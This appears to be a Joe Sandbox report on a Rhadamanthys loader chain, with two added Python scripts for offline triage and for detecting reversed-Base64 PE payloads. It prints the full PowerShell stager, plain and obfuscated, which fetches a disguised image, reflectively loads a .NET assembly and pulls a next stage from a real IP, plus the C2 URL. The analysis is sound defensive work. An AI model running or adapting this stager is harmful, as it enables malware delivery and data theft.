$commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function 
DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@
I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J

Data Obfuscation

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; 
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String
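The Sigma-matched command above is the whole first stage of the loader: fetch a file served as test.jpg from a shuffled link list, cut the text between <<BASE64_START>> and <<BASE64_END>>, Base64-decode it, hand the bytes to [System.Reflection.Assembly]::Load, and invoke a method with a reversed URL string as its first argument. The Python below is an added triage script, not part of this Joe Sandbox report or of the sample. It replays that extraction offline on a constructed stand-in for test.jpg (a few JPEG bytes around a marked, Base64-encoded minimal MZ/PE skeleton), checks that the decoded bytes are a PE image before anything loads them, and un-reverses the argument string exactly as the sample passes it. The image and the PE skeleton are constructed; the argument string is the one in the command.

```python
import base64
import binascii
import re
from typing import Optional

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"
_WS = re.compile(rb"\s+")


def extract_marked_payload(blob: bytes) -> Optional[bytes]:
    """Replay the stager: IndexOf(start), IndexOf(end), Substring, FromBase64String.

    Searches bytes instead of a UTF-8 decoded string so that undecodable
    bytes in the image prefix cannot shift the offsets.
    """
    start = blob.find(START_FLAG)
    if start < 0:
        return None
    start += len(START_FLAG)
    end = blob.find(END_FLAG, start)
    if end < 0:
        return None
    try:
        return base64.b64decode(_WS.sub(b"", blob[start:end]), validate=True)
    except (binascii.Error, ValueError):
        return None


def is_pe_image(data: bytes) -> bool:
    """MZ stub plus a valid e_lfanew -> PE\\0\\0 link, checked before anything loads it."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def unreverse_argument(arg: str) -> str:
    """The assembly receives its download path reversed and space-padded."""
    return arg[::-1].strip()


def build_fake_pe() -> bytes:
    """Constructed stand-in for the .NET assembly: a minimal MZ/PE skeleton."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> PE signature
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


def build_fake_image() -> bytes:
    """Constructed 'test.jpg': JPEG SOI/APP0 bytes, filler, the marked blob, EOI."""
    return (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x8a" * 32
            + START_FLAG + base64.b64encode(build_fake_pe()) + END_FLAG
            + b"\xff\xd9")


# Argument string exactly as the sample passes it to the loaded assembly.
REVERSED_ARG = " txt.chAFAmk/selif_cilbup/46.622.06.26//:"


def triage(blob: bytes, reversed_arg: str = REVERSED_ARG) -> dict:
    """Summarise what the downloaded 'image' carries and where stage two lives."""
    payload = extract_marked_payload(blob)
    return {
        "has_markers": payload is not None,
        "is_pe": payload is not None and is_pe_image(payload),
        "payload_len": 0 if payload is None else len(payload),
        "next_stage": unreverse_argument(reversed_arg),
    }


if __name__ == "__main__":
    for key, value in triage(build_fake_image()).items():
        print(f"{key}: {value}")
```

The un-reversed argument has no scheme; the assembly evidently supplies it, since the http:// form of the same URL appears among the powershell.exe memory strings in the Networking section and is the GET /public_files/kmAFAhc.txt request seen on the wire. Note also that the stager tolerates any bytes before the start marker, so the file can be a valid picture to a casual viewer.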
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2025-01-20T15:48:50.614088+0100 | 2057635 | 1 | A Network Trojan was detected | 62.60.226.64 | 80 | 192.168.2.4 | 49739 | TCP
                    2025-01-20T15:49:13.952121+0100 | 2049038 | 1 | A Network Trojan was detected | 54.231.134.241 | 443 | 192.168.2.4 | 49738 | TCP


                    AV Detection

                    barindex
                    Source: powershell.exe.8112.10.memstrminMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1"}
                    Source: good.exeReversingLabs: Detection: 18%
                    Source: good.exeVirustotal: Detection: 22%Perma Link
                    Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7319130EC
                    Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 54.231.134.241:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: good.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: good.exe
                    Source: Binary string: wextract.pdbGCTL source: good.exe
                    Source: Binary string: wkernel32.pdb source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF73191204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73191204C

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 62.60.226.64:80 -> 192.168.2.4:49739
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 54.231.134.241:443 -> 192.168.2.4:49738
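Both Suricata hits are signatures for Base64 text that has been reversed, so that the familiar "TVqQ" (Base64 of an MZ header) is not at the start of the response body. The Python below is an added example of the detection idea, not the ET rule text and not anything from this report. It shows the cheap prefix test an IDS can apply (the first three Base64 symbols of any MZ-prefixed blob are "TV" followed by one of o, p, q, r) at both ends of a body, and a fuller check that un-reverses, decodes and validates the e_lfanew -> PE\0\0 link so that ordinary text that merely starts with "MZ" does not fire. The sample bodies are constructed from a minimal PE skeleton.

```python
import base64
import binascii
import re

_WS = re.compile(rb"\s+")
# Base64 of any 3 bytes starting with "MZ": "TV" then a symbol whose top four
# bits are 1010, i.e. one of o, p, q, r (the third byte's top two bits vary).
_MZ_THIRD = b"opqr"


def build_fake_pe() -> bytes:
    """Constructed minimal MZ/PE skeleton standing in for the real payload."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> PE signature
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


# Constructed HTTP bodies: plain Base64 and the reversed variant the rule names.
SAMPLE_BODY_PLAIN = base64.b64encode(build_fake_pe()) + b"\r\n"
SAMPLE_BODY_REVERSED = base64.b64encode(build_fake_pe())[::-1] + b"\r\n"


def fast_mz_prefix(body: bytes) -> str:
    """IDS-style test: MZ Base64 prefix at the head, or reversed at the tail."""
    text = _WS.sub(b"", body)
    if text[:2] == b"TV" and text[2:3] and text[2:3] in _MZ_THIRD:
        return "base64"
    tail = text[-3:][::-1]
    if tail[:2] == b"TV" and tail[2:3] and tail[2:3] in _MZ_THIRD:
        return "reversed_base64"
    return "clean"


def _decode(text: bytes):
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


def pe_e_lfanew(data: bytes):
    """Return e_lfanew if data is an MZ image whose e_lfanew points at PE\\0\\0."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return e_lfanew


def classify_body(body: bytes) -> dict:
    """Full check: decode as-is and reversed, and confirm a real PE header.

    Needs the whole body: in the reversed form the MZ header sits at the END,
    so a detector that inspects only the first N bytes of a response
    cannot see it.
    """
    text = _WS.sub(b"", body)
    for verdict, candidate in (("base64", text), ("reversed_base64", text[::-1])):
        decoded = _decode(candidate)
        if decoded is None:
            continue
        e_lfanew = pe_e_lfanew(decoded)
        if e_lfanew is not None:
            return {"verdict": verdict, "e_lfanew": e_lfanew, "size": len(decoded)}
    return {"verdict": "clean", "e_lfanew": None, "size": 0}


if __name__ == "__main__":
    for name, body in (("plain", SAMPLE_BODY_PLAIN), ("reversed", SAMPLE_BODY_REVERSED)):
        print(name, fast_mz_prefix(body), classify_body(body))
```

The prefix test is what makes this cheap enough for inline inspection, and the tail variant is what the reversed encoding is designed to dodge; the full decode is the confirmation step for a proxy or sandbox that holds the complete response. Both are defeated by one more trivial transform (a different marker, a substitution like the '@' for 'A' seen in this sample's first stage), so they belong alongside the process-tree rule wscript.exe -> powershell.exe -> RegAsm.exe rather than in place of it.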
                    Source: Malware configuration extractorURLs: https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1
                    Source: global trafficHTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?517613 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2FRbWfaSYmj1qK922%2BqxSm9MABVAMkZx5JZm3rwCcg5wX1F4OziYeFQ62%2FCrMOCBR0WPCJ7vRvmPaibga1Dr8iVpJAsA4gu4VzYUGceXMrIg71s6AQv9mhMr9BdNeEyZjX7FjkwQ%3D%3D&Expires=1737385784 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /public_files/kmAFAhc.txt HTTP/1.1Host: 62.60.226.64Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                    Source: Joe Sandbox ViewASN Name: ASLINE-AS-APASLINELIMITEDHK ASLINE-AS-APASLINELIMITEDHK
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64 (50 identical entries)
                    Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                    Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.60.226.64
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.60.226.64/public_files/kmAFAhc.txt
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.60.226.64/public_files/kmAFAhc.txtp
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000006.00000002.2324109491.000001E480094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwMSFT_PriSmbServerCertificateMapping.cdxml
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof.
                    Source: powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof..Diah
                    Source: fontdrvhost.exe, 0000000C.00000002.2036496891.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1
                    Source: fontdrvhost.exe, 0000000C.00000002.2036496891.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1x
                    Source: powershell.exe, 00000006.00000002.2324109491.000001E48006A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2324109491.000001E48004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                    Source: powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
